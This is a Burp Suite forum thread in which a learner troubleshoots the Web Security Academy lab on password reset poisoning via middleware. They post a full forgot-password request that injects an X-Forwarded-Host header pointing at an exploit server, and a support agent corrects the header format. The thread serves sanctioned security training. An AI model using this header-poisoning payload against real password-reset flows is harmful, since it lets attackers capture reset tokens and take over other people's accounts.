Burp Suite User Forum

Create new post

Host header not present - Password reset poisoning via middleware

Dennis | Last updated: Mar 25, 2022 01:53AM UTC

Hi, I'm trying to solve to complete the lab "Password reset poisoning via middleware". I sent POST /forgot-password to Repeater and add "X-Forwarded-Host: https://exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net" to the request. It looks like this in Repeater: POST /forgot-password HTTP/1.1 Host: aca81fc11fb90044c029b70c00d3002f.web-security-academy.net Cookie: session=r7onTvLunxE8EyQxuIqVXubS51iFgcr7 Content-Length: 15 Cache-Control: max-age=0 Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net/forgot-password Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 X-Forwarded-Host: https://exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net Connection: close username=carlos When I click Send, I get: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 25 "Host header not present" According to the video in the community solutions I should get a 200 OK response. I can't figure out what is going wrong here. I also tried to remove "exploit-" at the beginning of the link, which results in the same error. Could you tell me what I'm doing wrong? Thank you.

Hannah, PortSwigger Agent | Last updated: Mar 25, 2022 11:20AM UTC

It looks like you're using a full URL as your X-Forwarded-Host value. Try comparing the value you're using to the existing Host header, and spot the difference between the two.

Dennis | Last updated: Mar 28, 2022 10:06PM UTC

Thank you Hannah! I thought I tried without https:// as well, but apparently not, because it works now. :-)

Hannah, PortSwigger Agent | Last updated: Mar 29, 2022 07:56AM UTC

Glad to hear it! Hope you enjoy the rest of the labs :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.